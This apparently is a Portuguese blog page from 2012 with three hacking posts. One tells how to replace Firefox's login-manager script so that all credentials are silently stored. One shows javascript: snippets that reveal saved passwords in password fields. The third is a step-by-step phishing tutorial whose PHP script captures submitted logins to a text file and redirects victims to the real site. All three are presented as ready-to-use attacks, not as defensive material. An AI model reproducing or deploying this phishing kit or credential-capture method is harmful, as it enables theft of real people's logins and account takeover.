Mostrando postagens com marcador Navegador. Mostrar todas as postagens
Mostrando postagens com marcador Navegador. Mostrar todas as postagens

segunda-feira, 2 de abril de 2012

Transformando o Firefox em um Keylogger



Vamos ver como trnasformar o Firefox em um keylogger muito útil.

Técnica descoberta por RAJ.

A tecnica consiste forçar o uso o proprio armazenamento de senhas do Firefox, muito simples!
Não é necessário nenhum programa, apenas substituir o javascript original por um modificado, a modificação faz um bypass que força o armazenamento da identidade.
E o melhor, é cross platform… funciona em todos sistemas operacionais!

Como?

1 – Feche o firefox.

2 – No Windows, vá em: C:/Arquivos de programas/Mozilla Firefox/Components
Linux, por exemplo em: /usr/lib/firefox-3.6.3/components/
Mac: Applications > botão direito no Firefox > Show Package Contents > Contents/MacOS/Components.

3 – Iremos substituir o script chamado “nsLoginManagerPrompter.js” pelo bypassed, baixe a modificação aqui, talvez vc queira copiar o original antes de substituir pelo modificado.

Uma vez substituido, está pronto!
Agora o Firefox irá armazenar automaticamente todas informações de login!

Para ver esses dados abra o Firefox, Editar, Preferencias / aba Segurança e clique em “senhas salvas”…. pronto, está tudo ai!

Espero que seja útil a vocês, Abraços
Reeves
Postado por às Nenhum comentário:
Marcadores: , , , ,

Recuperando senhas gravadas no navegador


Existem softwares para recuperação de senhas gravadas em inputs do tipo password, neste caso não vamos utilizar nenhum programa externo, apenas javascript e umnavegador (testado apenas no FF).

O primeiro passo é acessar o site e fazer com que a senha seja carregada no campo de password, em alguns casos é necessário digitar o usuário para que isto aconteça.

Feito isso, carregue o jQuery no site através do campo da url:
javascript:var%20script=document.createElement(“script”);script.type=”text/javascript”;
script.src=”http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js“;
document.getElementsByTagName(“head”)[0].appendChild(script);void(0);
Sabendo que agora você pode usar os recursos do jQuery, você precisa encontrar o input do tipo password e exibir o atributo “value” dele, o código que faz isso:

javascript:alert($(“input[type=password]“).val())

Simples assim, este comando deve abrir um alert com a sua senha.
Postado por às Nenhum comentário:
Marcadores: ,

sexta-feira, 30 de março de 2012

Tutorial sobre Phishing


Tenho postado sobre phishing e o atacante utilizando técnicas para espalhar seus sites de phishing. Agora, vamos ver como eles criam essas páginas de phishing em primeiro lugar com o passo-a-passo. O Conhecimento de PHP e HTML será muito útil para criar páginas de login falso



1- Selecione um site de destino e navegue até a página de login.

2- Salve a página inteira indo em Arquivo-> Salvar como .. (Estou fazendo isso no Firefox .)

3- Você terá agora um arquivo HTML e uma pasta cheia de imagens e talvez alguns arquivos JavaScript. Renomeie o arquivo HTML para index.html e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.

4- Crie um arquivo PHP com o nome “phish.php“

5- Cole o seguinte código para o arquivo PHP (phish.php) que você já fez. Este código é o que leva os detalhes de login e os armazena no arquivo “lista.txt“, e depois redireciona para o site real. Desta forma, o usuário vai pensar que ele colocou as informações de login errado e terá êxito, a segunda vez que ele for tentar se logar o site se redirecionara para o site real. Fazendo assim com que a vitima nem perceba que seus dados foram roubados.

<?php
Header("Location: http://www.linkdositeoriginal.com");
$handle = fopen("lista.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

6. Agora temos que apontar o formulário de login no arquivo HTML para o arquivo PHP (phish.php). Localize o código do formulário no arquivo HTML e alterar o link de ação para o arquivo PHP e do tipo de método decomeçar assim que as informações apresentadas são passados através da URL. O código HTML deve começar com algo como isto:

<form action = sitelink ” . com o método = “GET”>

altere para:

<form action = http://www.site.com/phish.php ” . com o método = “GET”>

Ou:

<form action = phish.php ” . com o método = “GET”>

7. Quando tudo estiver concluído, faça o upload dos arquivos para um webhost gratuito que suporte PHP.

8. Você acabou de criar uma página de phishing.
Autor: Diablos 4-Ever
Postado por às Nenhum comentário:
Marcadores: , , , , , , , ,
Assinar: Postagens (Atom)